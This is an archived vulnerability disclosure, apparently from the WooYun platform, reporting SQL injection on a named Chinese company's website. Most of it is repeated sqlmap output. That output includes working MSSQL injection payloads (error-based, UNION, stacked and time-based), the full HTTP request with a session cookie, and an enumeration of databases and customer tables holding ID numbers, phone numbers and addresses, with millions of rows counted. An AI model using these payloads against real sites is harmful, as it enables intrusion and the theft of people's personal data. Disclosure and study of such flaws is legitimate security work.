乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2015-05-25: 积极联系厂商并且等待厂商认领中,细节不对外公开 2015-07-09: 厂商已经主动忽略漏洞,细节向公众公开
用户数据泄露,身份证手机号信息暴露。
GET /knowledgelist.aspx?keywordId=1&newstypeId=&productId=642 HTTP/1.1X-Requested-With: XMLHttpRequestReferer: http://www.1mutian.com:80/Cookie: ASP.NET_SessionId=njtdkt1ldnmtapglbxntnrar; BrowedProductList-Admin=%3c%3fxml+version%3d%221.0%22+encoding%3d%22utf-16%22%3f%3e%0d%0a%3cArrayOfInt+xmlns%3axsi%3d%22http%3a%2f%2fwww.w3.org%2f2001%2fXMLSchema-instance%22+xmlns%3axsd%3d%22http%3a%2f%2fwww.w3.org%2f2001%2fXMLSchema%22%3e%0d%0a++%3cint%3e686%3c%2fint%3e%0d%0a++%3cint%3e1878%3c%2fint%3e%0d%0a++%3cint%3e1859%3c%2fint%3e%0d%0a++%3cint%3e1427%3c%2fint%3e%0d%0a++%3cint%3e1411%3c%2fint%3e%0d%0a++%3cint%3e438%3c%2fint%3e%0d%0a++%3cint%3e396%3c%2fint%3e%0d%0a++%3cint%3e790%3c%2fint%3e%0d%0a++%3cint%3e1861%3c%2fint%3e%0d%0a++%3cint%3e1660%3c%2fint%3e%0d%0a++%3cint%3e1674%3c%2fint%3e%0d%0a%3c%2fArrayOfInt%3e; CheckCode=DHJ8J; 1=1Host: www.1mutian.comConnection: Keep-aliveAccept-Encoding: gzip,deflateUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/28.0.1500.63 Safari/537.36Accept: */*
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:---Parameter: keywordId (GET) Type: error-based Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause Payload: keywordId=1' AND 7323=CONVERT(INT,(SELECT CHAR(113)+CHAR(103)+CHAR(112)+CHAR(122)+CHAR(113)+(SELECT (CASE WHEN (7323=7323) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(110)+CHAR(101)+CHAR(103)+CHAR(113))) AND 'FTtm'='FTtm&newstypeId=&productId=642 Type: UNION query Title: Generic UNION query (NULL) - 1 column Payload: keywordId=-7874' UNION ALL SELECT CHAR(113)+CHAR(103)+CHAR(112)+CHAR(122)+CHAR(113)+CHAR(98)+CHAR(121)+CHAR(89)+CHAR(73)+CHAR(108)+CHAR(85)+CHAR(110)+CHAR(108)+CHAR(87)+CHAR(97)+CHAR(113)+CHAR(110)+CHAR(101)+CHAR(103)+CHAR(113)-- &newstypeId=&productId=642 Type: stacked queries Title: Microsoft SQL Server/Sybase stacked queries Payload: keywordId=1'; WAITFOR DELAY '0:0:5'--&newstypeId=&productId=642 Type: AND/OR time-based blind Title: Microsoft SQL Server/Sybase time-based blind Payload: keywordId=1' WAITFOR DELAY '0:0:5'--&newstypeId=&productId=642---web server operating system: Windows 2008 or Vistaweb application technology: ASP.NET 4.0.30319, ASP.NET, Microsoft IIS 7.0back-end DBMS: Microsoft SQL Server 2008current user: 'ymt'current database: 'YMTTransDb'sqlmap identified the following injection points with a total of 0 HTTP(s) requests:---Parameter: keywordId (GET) Type: error-based Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause Payload: keywordId=1' AND 7323=CONVERT(INT,(SELECT CHAR(113)+CHAR(103)+CHAR(112)+CHAR(122)+CHAR(113)+(SELECT (CASE WHEN (7323=7323) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(110)+CHAR(101)+CHAR(103)+CHAR(113))) AND 'FTtm'='FTtm&newstypeId=&productId=642 Type: UNION query Title: Generic UNION query (NULL) - 1 column Payload: keywordId=-7874' UNION ALL SELECT CHAR(113)+CHAR(103)+CHAR(112)+CHAR(122)+CHAR(113)+CHAR(98)+CHAR(121)+CHAR(89)+CHAR(73)+CHAR(108)+CHAR(85)+CHAR(110)+CHAR(108)+CHAR(87)+CHAR(97)+CHAR(113)+CHAR(110)+CHAR(101)+CHAR(103)+CHAR(113)-- &newstypeId=&productId=642 Type: stacked queries Title: Microsoft SQL Server/Sybase stacked queries Payload: keywordId=1'; WAITFOR DELAY '0:0:5'--&newstypeId=&productId=642 Type: AND/OR time-based blind Title: Microsoft SQL Server/Sybase time-based blind Payload: keywordId=1' WAITFOR DELAY '0:0:5'--&newstypeId=&productId=642---web server operating system: Windows 2008 or Vistaweb application technology: ASP.NET 4.0.30319, ASP.NET, Microsoft IIS 7.0back-end DBMS: Microsoft SQL Server 2008available databases [10]:[*] CustomerUser[*] master[*] MobileSymbol[*] model[*] msdb[*] ReportServer[*] ReportServerTempDB[*] tempdb[*] YMTShopDate[*] YMTTransDbsqlmap identified the following injection points with a total of 0 HTTP(s) requests:---Parameter: keywordId (GET) Type: error-based Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause Payload: keywordId=1' AND 7323=CONVERT(INT,(SELECT CHAR(113)+CHAR(103)+CHAR(112)+CHAR(122)+CHAR(113)+(SELECT (CASE WHEN (7323=7323) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(110)+CHAR(101)+CHAR(103)+CHAR(113))) AND 'FTtm'='FTtm&newstypeId=&productId=642 Type: UNION query Title: Generic UNION query (NULL) - 1 column Payload: keywordId=-7874' UNION ALL SELECT CHAR(113)+CHAR(103)+CHAR(112)+CHAR(122)+CHAR(113)+CHAR(98)+CHAR(121)+CHAR(89)+CHAR(73)+CHAR(108)+CHAR(85)+CHAR(110)+CHAR(108)+CHAR(87)+CHAR(97)+CHAR(113)+CHAR(110)+CHAR(101)+CHAR(103)+CHAR(113)-- &newstypeId=&productId=642 Type: stacked queries Title: Microsoft SQL Server/Sybase stacked queries Payload: keywordId=1'; WAITFOR DELAY '0:0:5'--&newstypeId=&productId=642 Type: AND/OR time-based blind Title: Microsoft SQL Server/Sybase time-based blind Payload: keywordId=1' WAITFOR DELAY '0:0:5'--&newstypeId=&productId=642---web server operating system: Windows 2008 or Vistaweb application technology: ASP.NET 4.0.30319, ASP.NET, Microsoft IIS 7.0back-end DBMS: Microsoft SQL Server 2008Database: CustomerUser[3 tables]+---------------------+| CustomerInformation || T_DeletePhone || 私人营业库 |+---------------------+sqlmap identified the following injection points with a total of 0 HTTP(s) requests:---Parameter: keywordId (GET) Type: error-based Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause Payload: keywordId=1' AND 7323=CONVERT(INT,(SELECT CHAR(113)+CHAR(103)+CHAR(112)+CHAR(122)+CHAR(113)+(SELECT (CASE WHEN (7323=7323) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(110)+CHAR(101)+CHAR(103)+CHAR(113))) AND 'FTtm'='FTtm&newstypeId=&productId=642 Type: UNION query Title: Generic UNION query (NULL) - 1 column Payload: keywordId=-7874' UNION ALL SELECT CHAR(113)+CHAR(103)+CHAR(112)+CHAR(122)+CHAR(113)+CHAR(98)+CHAR(121)+CHAR(89)+CHAR(73)+CHAR(108)+CHAR(85)+CHAR(110)+CHAR(108)+CHAR(87)+CHAR(97)+CHAR(113)+CHAR(110)+CHAR(101)+CHAR(103)+CHAR(113)-- &newstypeId=&productId=642 Type: stacked queries Title: Microsoft SQL Server/Sybase stacked queries Payload: keywordId=1'; WAITFOR DELAY '0:0:5'--&newstypeId=&productId=642 Type: AND/OR time-based blind Title: Microsoft SQL Server/Sybase time-based blind Payload: keywordId=1' WAITFOR DELAY '0:0:5'--&newstypeId=&productId=642---web server operating system: Windows 2008 or Vistaweb application technology: ASP.NET 4.0.30319, ASP.NET, Microsoft IIS 7.0back-end DBMS: Microsoft SQL Server 2008Database: CustomerUserTable: CustomerInformation[15 columns]+--------+----------+| Column | Type |+--------+----------+| id | int || mobile | varchar || 使用人 | nvarchar || 出生日期 | nvarchar || 初次登记日期 | datetime || 卡型 | nvarchar || 名字 | nvarchar || 地址 | nvarchar || 套餐更改日期 | datetime || 性别 | nvarchar || 手机 | float || 有效日期 | datetime || 证件号码 | nvarchar || 话费 | nvarchar || 邮编 | nvarchar |+--------+----------+sqlmap identified the following injection points with a total of 0 HTTP(s) requests:---Parameter: keywordId (GET) Type: error-based Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause Payload: keywordId=1' AND 7323=CONVERT(INT,(SELECT CHAR(113)+CHAR(103)+CHAR(112)+CHAR(122)+CHAR(113)+(SELECT (CASE WHEN (7323=7323) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(110)+CHAR(101)+CHAR(103)+CHAR(113))) AND 'FTtm'='FTtm&newstypeId=&productId=642 Type: UNION query Title: Generic UNION query (NULL) - 1 column Payload: keywordId=-7874' UNION ALL SELECT CHAR(113)+CHAR(103)+CHAR(112)+CHAR(122)+CHAR(113)+CHAR(98)+CHAR(121)+CHAR(89)+CHAR(73)+CHAR(108)+CHAR(85)+CHAR(110)+CHAR(108)+CHAR(87)+CHAR(97)+CHAR(113)+CHAR(110)+CHAR(101)+CHAR(103)+CHAR(113)-- &newstypeId=&productId=642 Type: stacked queries Title: Microsoft SQL Server/Sybase stacked queries Payload: keywordId=1'; WAITFOR DELAY '0:0:5'--&newstypeId=&productId=642 Type: AND/OR time-based blind Title: Microsoft SQL Server/Sybase time-based blind Payload: keywordId=1' WAITFOR DELAY '0:0:5'--&newstypeId=&productId=642---web server operating system: Windows 2008 or Vistaweb application technology: ASP.NET 4.0.30319, ASP.NET, Microsoft IIS 7.0back-end DBMS: Microsoft SQL Server 2008Database: CustomerUser+-------------------------+---------+| Table | Entries |+-------------------------+---------+| dbo.CustomerInformation | 5294405 |+-------------------------+---------+sqlmap identified the following injection points with a total of 0 HTTP(s) requests:---Parameter: keywordId (GET) Type: error-based Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause Payload: keywordId=1' AND 7323=CONVERT(INT,(SELECT CHAR(113)+CHAR(103)+CHAR(112)+CHAR(122)+CHAR(113)+(SELECT (CASE WHEN (7323=7323) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(110)+CHAR(101)+CHAR(103)+CHAR(113))) AND 'FTtm'='FTtm&newstypeId=&productId=642 Type: UNION query Title: Generic UNION query (NULL) - 1 column Payload: keywordId=-7874' UNION ALL SELECT CHAR(113)+CHAR(103)+CHAR(112)+CHAR(122)+CHAR(113)+CHAR(98)+CHAR(121)+CHAR(89)+CHAR(73)+CHAR(108)+CHAR(85)+CHAR(110)+CHAR(108)+CHAR(87)+CHAR(97)+CHAR(113)+CHAR(110)+CHAR(101)+CHAR(103)+CHAR(113)-- &newstypeId=&productId=642 Type: stacked queries Title: Microsoft SQL Server/Sybase stacked queries Payload: keywordId=1'; WAITFOR DELAY '0:0:5'--&newstypeId=&productId=642 Type: AND/OR time-based blind Title: Microsoft SQL Server/Sybase time-based blind Payload: keywordId=1' WAITFOR DELAY '0:0:5'--&newstypeId=&productId=642---web server operating system: Windows 2008 or Vistaweb application technology: ASP.NET 4.0.30319, ASP.NET, Microsoft IIS 7.0back-end DBMS: Microsoft SQL Server 2008Database: CustomerUser+-------+---------+| Table | Entries |+-------+---------+| dbo.私人营业库 | 6847309 |+-------+---------+sqlmap identified the following injection points with a total of 0 HTTP(s) requests:---Parameter: keywordId (GET) Type: error-based Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause Payload: keywordId=1' AND 7323=CONVERT(INT,(SELECT CHAR(113)+CHAR(103)+CHAR(112)+CHAR(122)+CHAR(113)+(SELECT (CASE WHEN (7323=7323) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(110)+CHAR(101)+CHAR(103)+CHAR(113))) AND 'FTtm'='FTtm&newstypeId=&productId=642 Type: UNION query Title: Generic UNION query (NULL) - 1 column Payload: keywordId=-7874' UNION ALL SELECT CHAR(113)+CHAR(103)+CHAR(112)+CHAR(122)+CHAR(113)+CHAR(98)+CHAR(121)+CHAR(89)+CHAR(73)+CHAR(108)+CHAR(85)+CHAR(110)+CHAR(108)+CHAR(87)+CHAR(97)+CHAR(113)+CHAR(110)+CHAR(101)+CHAR(103)+CHAR(113)-- &newstypeId=&productId=642 Type: stacked queries Title: Microsoft SQL Server/Sybase stacked queries Payload: keywordId=1'; WAITFOR DELAY '0:0:5'--&newstypeId=&productId=642 Type: AND/OR time-based blind Title: Microsoft SQL Server/Sybase time-based blind Payload: keywordId=1' WAITFOR DELAY '0:0:5'--&newstypeId=&productId=642---web server operating system: Windows 2008 or Vistaweb application technology: ASP.NET 4.0.30319, ASP.NET, Microsoft IIS 7.0back-end DBMS: Microsoft SQL Server 2008Database: CustomerUserTable: 私人营业库[4 columns]+----------+----------+| Column | Type |+----------+----------+| Address | nvarchar || MailNo | nvarchar || TelPhone | nvarchar || Username | nvarchar |+----------+----------+
数据我就不跑了吧。
你们懂的
未能联系到厂商或者厂商积极拒绝
漏洞Rank:15 (WooYun评价)